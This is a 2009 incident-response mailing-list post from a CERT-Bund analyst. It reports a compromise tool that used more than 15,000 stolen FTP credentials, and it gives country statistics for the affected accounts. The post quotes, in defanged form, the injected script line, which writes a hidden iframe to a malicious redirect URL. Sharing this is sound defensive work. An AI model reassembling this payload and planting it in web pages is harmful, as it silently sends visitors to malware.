[nsp-sec] Compromised ftp accounts
Thomas Hungenberg
th.lab at hungenberg.net
Tue Aug 25 06:27:47 EDT 2009
Hi teams,
I've come across an Iframer installation along with a list of 15.000+ ftp credentials.
The Iframer tool most probably recently tried to inject this line (remove 'XXX'):
<scrXXXipt>document.write(\'<ifrXXXame src=\"htXXXtp://sexyy.ru/tds/go.php?sid=1\" width=\"0\" height=\"0\" style=\"display:none;visibility:hidden;\"></ifrXXXame>\');</scrXXXipt>
Please find attached a sanitized list (pw removed) of the compromised ftp accounts.
Format: ASN | IP | CC | ftp username | AS name
Top 10 country codes:
5240 US
1263 RU
1187 DE
882 EU
803 TR
720 CZ
674 FR
655 PL
564 HU
475 NL
- Thomas
CERT-Bund Incident Response & Anti-Malware Team
More information about the nsp-security
mailing list